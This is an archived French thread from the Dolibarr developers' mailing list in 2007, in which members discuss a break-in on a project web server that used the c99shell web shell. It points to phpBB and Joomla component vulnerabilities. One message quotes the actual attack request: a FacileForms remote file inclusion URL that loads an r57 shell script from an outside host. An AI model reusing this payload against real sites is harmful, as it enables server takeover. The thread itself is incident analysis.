[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RE: [Dolibarr-dev] Dolibarr.org et forum
|
From: |
Régis Houssin |
|
Subject: |
RE: [Dolibarr-dev] Dolibarr.org et forum |
|
Date: |
Fri, 20 Apr 2007 15:47:09 +0200 (CEST) |
|
User-agent: |
SquirrelMail/1.4.9a |
Merci, mais ce module n'est pas installé... heureusement apparement :))
Régis
> http://www.frsirt.com/bulletins/9992
>
> Titre : JoomlaPack for Joomla "mosConfig_absolute_path" PHP File Inclusion
> vulnerability
>
> -----Original Message-----
> From: address@hidden
> [mailto:address@hidden On Behalf Of
> Régis Houssin
> Sent: vendredi 13 avril 2007 23:51
> To: 'Discussions sur le developpement de Dolibarr'
> Subject: RE: [Dolibarr-dev] Dolibarr.org et forum
>
> Merci rodolphe,
>
> En fait je viens de trouver, ca vient de mon site joomla qui n'était pas à
> jour et qui émulait le register_global à on grrrrr.
>
> Voici ce qu'ils ont mis :
>
> /components/com_facileforms/facileforms.frame.php?ff_compath=http://tamturk.
> by.ru/r57.txt?
>
> Ce que je ne comprends pas c'est comment de r57.txt ca c'est retrouvé en
> users.php ?
>
> Régis
>
>
> -----Message d'origine-----
> De : address@hidden
> [mailto:address@hidden De
> la part de Rodolphe Quiedeville
> Envoyé : vendredi 13 avril 2007 22:53
> À : Discussions sur le developpement de Dolibarr
> Objet : Re: [Dolibarr-dev] Dolibarr.org et forum
>
> Le 13.04.2007 21:48, Régis Houssin a ecrit :
>> Bonjour,
>>
>> Je viens d'être victime d'un piratage sur mon serveur web.
>> Le forum et le site de Laurent (dolibarr.org) sont momentanément fermés
> afin
>> que je règle le problème.
>>
>> Apparemment les hackers ont utilisé un script php nommé c99shell
>>
>> Reste à savoir comment ils ont pu le télécharger sur le serveur.
>>
>> Si vous avez une idée sachant que j'ai des sites en joomla et des forums
> en
>> phpbb.
>
> phpbb est connu pour être assez vulnérable il y a un lien ici qui parle
> de c99shell
> http://www.phpbb.com/community/viewtopic.php?f=1&t=396462&p=2164981&hilit=
>
> A++
>
> --
> Rodolphe Quiédeville - Artisan Logiciel Libre
> http://rodolphe.quiedeville.org/
> Travaillons Libre - http://fr.lolix.org/
> W 2°56'45'' - N 47°38'20''
>
>
>
> _______________________________________________
> Dolibarr-dev mailing list
> address@hidden
> http://lists.nongnu.org/mailman/listinfo/dolibarr-dev
>
>
>
> _______________________________________________
> Dolibarr-dev mailing list
> address@hidden
> http://lists.nongnu.org/mailman/listinfo/dolibarr-dev
>
>
>
> _______________________________________________
> Dolibarr-dev mailing list
> address@hidden
> http://lists.nongnu.org/mailman/listinfo/dolibarr-dev
>
- [Dolibarr-dev] telephonie, Mathias WOLFF, 2007/04/10
- Re: [Dolibarr-dev] telephonie, Rodolphe Quiedeville, 2007/04/13
- Re: [Dolibarr-dev] telephonie, Mathias WOLFF, 2007/04/13
- Re: [Dolibarr-dev] telephonie, Rodolphe Quiedeville, 2007/04/13
- Re: [Dolibarr-dev] telephonie, Mathias WOLFF, 2007/04/13
- [Dolibarr-dev] Dolibarr.org et forum, Régis Houssin, 2007/04/13
- Re: [Dolibarr-dev] Dolibarr.org et forum, Rodolphe Quiedeville, 2007/04/13
- RE: [Dolibarr-dev] Dolibarr.org et forum, Régis Houssin, 2007/04/13
- RE: [Dolibarr-dev] Dolibarr.org et forum, Vianney ASSOFI, 2007/04/18
- RE: [Dolibarr-dev] Dolibarr.org et forum,
Régis Houssin <=